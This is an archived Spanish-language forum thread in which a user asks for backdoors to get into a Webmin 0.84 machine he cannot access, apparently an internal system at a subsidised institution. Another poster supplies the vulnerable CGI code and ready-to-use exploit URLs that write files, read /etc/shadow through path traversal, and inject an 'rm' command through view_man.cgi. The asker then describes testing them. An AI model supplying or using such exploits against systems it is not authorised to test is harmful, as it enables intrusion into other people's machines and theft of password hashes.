PDA

Ver la versión completa : WeBMiN 0.84



Angeliyo
19-12-2001, 23:37
No se si valdrá de algo...
Pero no consigo acceder a un ordenador regido por esta herramienta
WeBMiN 0.84 (lo digo de memoria pero supongo que es esta versión)
Si alguien conoce backdoors o bugs de este sistema comunicadmelo :)

MANDALA
27-12-2001, 04:21
Como nadie ha respondido te pongo un par de exploits para el Webmin.A ver si tienes suerte , a mi me tienen funcionado.
El fallo es este script del Webmin init/edit_action.cgi ke peta:
<snip>
open(FILE, $file);
while(<FILE>) {
$data .= $_;
if (/^\s*(['\"]?)([a-z]+)\1\)/i) {
$hasarg{$2}++;
}
}
close(FILE);
</snip>

Estos son los exploits:

Escribir archivos en el server:
http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev

No comment:
http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow

Aki hay otro donde peta el view_man.cgi :
http://www.dominio.com:10000/man/view_man.cgi?page=ipcs&sec=8&opts=&for=rm

Angeliyo
27-12-2001, 14:46
Rebooting OrdenaDor In My LinUX For TesTing It
Muchas Gracias Fiera!!!
No se si funcionará pero eres el único que te has molestado

CrAcKzMe
27-12-2001, 17:03
Juas, si yo supiera, echaria un cable :p

Angeliyo
27-12-2001, 20:52
Lo he probado y en las versiones 0.89 0.90 0.88 0.87 estos fallos estan solventados. La mákina con el 0.84 tengo qeu tener acceso local ya que esta denegado el acceso a ip's externas. Seguiré informando ;)

MANDALA
28-12-2001, 00:19
Oka.O sea ke es un ordena de una red interna..mmm..mola xD.

Angeliyo
30-12-2001, 15:17
Sip y además te puedo decir que es de un sitio con muchas ayudas de parte de la generalitat y que por llí pasan muchos estudiantes muy listos ;) hasta el dia 7 que siga con mis pruebs :P

DarkFireSold
10-08-2006, 09:42
http://www.securiteam.com/unixfocus/5CP0R1P80G.html

smaug_
10-08-2006, 11:12
Llegas un poco tarde no?? Mira la fecha del post.

DarkFireSold
17-08-2006, 11:12
un aporte es un aporte smaug_, siempre puede haber alguien que nesecite informacion

smaug_
17-08-2006, 12:43
BUeno, aunque siendo una vulnerabilidad del 2002, creo que ya estara mas que subsanada.